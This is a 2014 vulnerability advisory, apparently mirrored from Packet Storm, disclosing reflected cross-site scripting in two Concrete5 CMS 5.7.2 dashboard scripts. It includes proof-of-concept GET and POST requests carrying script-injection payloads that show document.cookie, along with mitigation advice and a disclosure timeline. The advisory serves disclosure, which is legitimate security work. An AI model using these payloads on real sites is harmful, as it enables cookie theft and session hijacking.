Concrete5 CMS 5.7.2 / 5.7.2.1 Cross Site Scripting

🗓️ 09 Dec 2014 00:00:00Reported by Simo Ben YoussefType

packetstorm🔗 packetstormsecurity.com👁 25 Views

Concrete5 CMS 5.7.2 / 5.7.2.1 Cross Site Scripting Vulnerabilities in bulkupdate.php and sitemap_drag_request.ph

`Title: Concrete5 CMS Reflected Cross-Site Scripting Vulnerabilities  
Author: Simo Ben youssef  
Contact: Simo_at_Morxploit_com  
Discovered: 02 November 2014  
Updated: 9 December 2014  
Published: 9 December 2014  
MorXploit Research  
http://www.MorXploit.com  
Vendor: Concrete5  
Vendor url: www.concrete5.org  
Software: Concrete5 CMS  
Versions: 5.7.2 and 5.7.2.1 (probably older)  
Status: Unpatched  
Vulnerable scripts:  
single_pages/dashboard/users/groups/bulkupdate.php  
tools/dashboard/sitemap_drag_request.php  
Original document: http://morxploit.com/morxploits/morxconxss.txt  
  
About Concrete5 (from Wikipedia):  
Concrete5 is an open source content management system (CMS) for publishing content on the World Wide Web and intranets.  
Concrete5 was designed for ease of use, for users with a minimum of technical skills. It enables users to edit site content directly from the page. It provides version management for every page, similar to wiki software, another type of web site development software. concrete5 allows users to edit images through an embedded editor on the page.  
  
To learn more please visit:  
http://en.wikipedia.org/wiki/Concrete5  
http://www.concrete5.org/  
  
Description:  
Concrete5 is vulnerable to Cross-Site Scripting, both bulkupdate.php and sitemap_drag_request.php scripts fail to properly sanitize user-supplied input.  
  
PoC Exploit:  
bulkupdate.php XSS is exploitable through $_REQUEST['gName']  
  
Using HTTP GET Method:  
http://target/index.php/dashboard/users/groups/bulkupdate/search?gName="><script>alert(document.cookie)</script>&ccm-submit-button=Search  
  
Using HTTP POST Method:  
POST http://target/index.php/dashboard/users/groups/bulkupdate/search  
  
POST DATA:  
gName="><script>alert(document.cookie)</script>&ccm-submit-button=Search  
  
  
sitemap_drag_request.php XSS is triggered through $_REQUEST['instance_id'] but requires a valid ccm_token value which makes it unexploitable (unless the attacker somehow obtains a valid token)  
  
Using HTTP GET Method:  
http://target/index.php/tools/required/dashboard/sitemap_drag_request?origCID=147&destCID=148&instance_id="><BODY ONLOAD=alert(document.cookie)>&ctask=MOVE&ccm_token=1418116264:3ac1b1774e77fbc61b1c6b97a4f7c9ea&dragMode=over  
  
Mitigation:  
Validate/Sanitize user supplied-input through $_REQUEST['gName'] and $_REQUEST['instance_id']  
  
Disclosure time-line  
02 November 2014: Discovery.  
03 November 2014: Initial report sent.  
11 November 2014: Second contact.  
No response.  
09 December 2014: Public disclosure.  
  
Author disclaimer:  
The information contained in this entire document is for educational, demonstration and testing purposes only.  
Author cannot be held responsible for any malicious use or damage. Use at your own risk.  
  
`

09 Dec 2014 00:00Current

7.4High risk

Vulners AI Score7.4

concrete5; cms; cross-site scripting; vulnerabilities; morxploit research; content management system; unpatched; xss; mitigation; disclosure timeline; educational; testing.